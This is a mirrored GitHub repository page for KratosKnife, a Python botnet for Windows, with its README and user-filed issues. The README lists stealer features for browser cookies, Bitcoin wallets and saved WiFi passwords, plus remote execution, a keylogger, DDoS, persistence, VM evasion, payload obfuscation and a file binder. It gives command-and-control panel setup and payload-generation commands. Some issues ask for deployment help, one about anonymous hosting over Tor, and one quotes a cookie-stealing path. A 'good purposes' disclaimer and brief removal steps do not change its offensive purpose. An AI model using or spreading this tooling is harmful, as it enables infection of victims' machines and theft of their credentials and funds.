Git Product home page Git Product logo

pushpenderindia / kratosknife Goto Github PK

View Code? Open in Web Editor NEW
346.0 13.0 88.0 5.95 MB

KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc

License: BSD 3-Clause "New" or "Revised" License

Python 99.65% Batchfile 0.35%
botnet slave bot advanced pentest php html bypass-vm persistence built-in-binder

kratosknife's Introduction

KratosKnife Logo

KratosKnife

KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Note: Some Features are under development

Commands Available In Attacker/Admin Panel

Clients Command Location Stealer
1. Ping 1. Get Location Information 1. Steal Firefox Cookie
2. Upload & Execute File 2. Show Location On Map 2. Steal Chrome Cookie
3. Show MessageBox Computer Commands 3. Steal Bitcoin Wallet
4. Take Screenshot 1. Shutdown 4. Steal WiFI Saved Password
5. Installed Software 2. Restart Keylogger
6. Execute Scripts 3. Logoff 1. Start Keylogger [Under Development]
7. Elevate User Status Open Webpage 2. Stop Keylogger [Under Development]
8. Clear TEMP Folder 1. Open Webpage (Visible) 3. Retrive Logs [Under Development]
Clients Commands DDOS Attack
1. Close Connection Start DDOS [Under Development]
2. Move Client [Under Development] Stop DDOS [Under Development]
3. Blacklist IP [Under Development]
4. Update Client [Under Development]
5. Restart Client [Under Development]
6. Uninstall [Under Development]

Generator Features

  • Encrypt Source Code Using AES 256 Bit Encryption
  • Encrypt Source Code Using Base64 Encoding
  • Packing Evil Exe Using UPX Packer
  • Interactive Mode [Generator Ask Required Parameter]
  • Debug Mode [Can Be Used In Debugging Payload]
  • Persistence Payload
  • 3 Powerfull Methods to Detect/Bypass VM (such as VirtualBox, VMware, Sandboxie)
  • Built-in File Binder
  • Useful Icons Inside icon Folder
Virtual Machine Bypass Methods Includes
Registry Check
Processes and Files Check
MAC Adderess Check

Screenshots

Login Page

Dashboard (Attacker Control Panel)

Show Victim Location On Map [NOTE: Location is IP Based, Not GPS]

Prerequisite

  • Python 3.X
  • Few External Modules

Server Setup

  1. Upload & Unzip panel.zip on your hosting available in this repo
  2. Create a database with any name you want
  3. Change the data in classes/Database.php
  4. Change files and folders permission to 777 [Uploads Folder, Scripts Folder]
  5. Go to install.php to create the botnet tables automatically
  • [For Testing Locally]
  1. Install XAMPP, & Put panel files inside htdocs folder and Run Apache & MySQL Service In XAMPP Controller
  2. Create a database with any name you want
  3. Change the data in classes/Database.php
  4. Go to install.php to create the botnet tables automatically

Usage

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/KratosKnife.git

# Go into the repository
$ cd KratosKnife/Botnet-Generator

# Installing dependencies
$ python -m pip install -r requirements.txt

# Update pyinstaller.exe path, in Generator.py (line 9) 

# Getting Help Menu
$ python Generator.py --help

# Making Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
--interactive Takes Input by asking Questions
--icon ICON Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-i INTERVAL --interval INTERVAL Time between reports in seconds. default=12. [Under Development]
-t TIME_PERSISTENT --persistence TIME_PERSISTENT Becoming Persistence After __ seconds. default=10
-b file.txt --bind LEGITIMATE_FILE_PATH.pdf Built-In Binder : Specify Path of Legitimate file. [Under Development]
  • Required Arguments
Short Hand Full Hand Description
-s SERVER --server SERVER Command & Control Server for Botnet.
-o OUT --output OUTPUT Output file name.

Removing BOTNET

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called "WindowsUpdate", right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveBOTNET.bat" in Infected System.
  • Restart Infected PC to stop the current Running Evil File.
  • Run "RemoveBOTNET.bat" again.

TODO

  • Add New features
  • Add GUI BOTNET Generator

More Features Coming Soon...

kratosknife's People

Contributors

pushpenderindia avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

kratosknife's Issues

Firefox cookies stealer

You entered your profile name in your browser.
Firefox always generates profile names at random, so it won't work for others.

source = f"C:\\Users\\{self.username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\q1dyz51w.default\\cookies.sqlite"

The Stub only work on debug mode

Hey so I tried to build kratos Stub but I didnt worked so I did somes investigation after looking up here's my conclusion :
Pyinstaller is the problem : --onefile and --noconsole cant be used at the same time I can only have 1 but not both
I'm running on python3.9 and Pyinstaller 4.5.1 anyone have a fix ?

Client not showing or updating on panel

After creating exe and hosting the panel, the exe is receiving a command list but the client is not getting updated on a dashboard.
Exe message in the dilog box-

[*] Recived Command List : ['(\x9af\xa7v\.....................]

no connection to panel

It doesn't connect to the server on my physical computer. when I open generated exe file it says:
The operation completed successfully
Vmware Mac Address Detected

Can somebody help me with the installation process?

I unzipped the 'panel' folder, and installed php to execute the php files. However, I need help with the steps in between.

Could someone make a video on how to install it, or write detailed steps for the installation please?

Problem in Run install.php on my local domain. (Step 5 from Server Setup)

Hi
I want to install panel on xampp in windows server 2012 r2. After that, i created the database in the step 2 and then changed the data such as database name and host name to my own database name and host name. Then i changed the permissions and so i executed in URL http://localhost/install.php. it returns me ===> "Unable to connect: SQLSTATE[HY000] [2006] MySQL server has gone away". Please guide me how to solve this problem. Note that, i am realy so glad for using this tool.

Thanks a lot.

problem install

Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-bvj25ucj/PyInstaller/

no bots listed / how to add bots

Hello, no bots are displayed for me, which means I can't do anything with the program. Now I need help. How can I add bots or solve the problem?

MfG
Screenshot 2024-07-06 201334

Compiling problem

[*] Compiling Source codes ...
The system cannot find the path specified.

Hosting provider / Tor / Anonymous

Any recommendations? Where should i host it? Can i use a raspberry pi? Can i route it trough tor and if so how?
Thank you in advance!

The filename, directory name, or volume label syntax is incorrect.

←[93m
[] Initiating AES Encryption Process ...
←[1;32m[+] Process Completed Successfully!
←[93m
[
] Compiling Source codes ...←[1;35m
The filename, directory name, or volume label syntax is incorrect.

[*] Deleting Junk Files ...
[+] Deleted Successfully !

cant generate

pretty much looks like a good tool but does not generate exe , i am currently having a traceback in Generator.py

Login Data?

I installed the full panel and everything but i have to login but i got no login data??

steal wifi saved passwords no work

hello! most of the functions when I execute them in an active infected do not work, and it is not a virtual machine, do you know why?

Panel installation problem

when I press Start installation button in install.php it says "Problem in executing the SQL query CREATE TABLE admin ( id int(11) UNSIGNED NOT NULL, username text NOT NULL, password text NOT NULL, email text NOT NULL, role text NOT NULL, s2fa varchar(10) NOT NULL, secret varchar(100) NOT NULL, sqenable varchar(10) NOT NULL, question text NOT NULL, answer text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;"

What did I do wrong? Please help me sir

Setting up bot panel

Can you explain how to setup this bot panel in 000webhost i tried but i cant install panel it gave sql error can you explain in brief

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.